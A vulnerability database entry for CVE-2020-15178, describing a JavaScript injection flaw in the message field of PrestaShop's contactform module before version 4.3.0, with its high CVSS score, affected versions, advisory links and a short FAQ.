Vulnerability Description
In PrestaShop contactform module (prestashop/contactform) before version 4.3.0, an attacker is able to inject JavaScript while using the contact form. The `message` field was incorrectly unescaped, possibly allowing attackers to execute arbitrary JavaScript in a victim's browser.
CVSS Score
HIGH
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Prestashop | Contactform | < 4.3.0 |
Related Weaknesses (CWE)
References
- https://github.com/PrestaShop/contactform/commit/ecd9f5d14920ec00885766a7cb41bccPatchThird Party Advisory
- https://github.com/PrestaShop/contactform/security/advisories/GHSA-95hx-62rh-gg9Third Party Advisory
- https://packagist.org/packages/prestashop/contactformVendor Advisory
- https://github.com/PrestaShop/contactform/commit/ecd9f5d14920ec00885766a7cb41bccPatchThird Party Advisory
- https://github.com/PrestaShop/contactform/security/advisories/GHSA-95hx-62rh-gg9Third Party Advisory
- https://packagist.org/packages/prestashop/contactformVendor Advisory
FAQ
What is CVE-2020-15178?
CVE-2020-15178 is a vulnerability with a CVSS score of 8.0 (HIGH). In PrestaShop contactform module (prestashop/contactform) before version 4.3.0, an attacker is able to inject JavaScript while using the contact form. The `message` field was incorrectly unescaped, po...
How severe is CVE-2020-15178?
CVE-2020-15178 has been rated HIGH with a CVSS base score of 8.0/10. Review the CVSS metrics above for detailed severity breakdown.
Is there a patch for CVE-2020-15178?
Check the references section above for vendor advisories and patch information. Affected products include: Prestashop Contactform.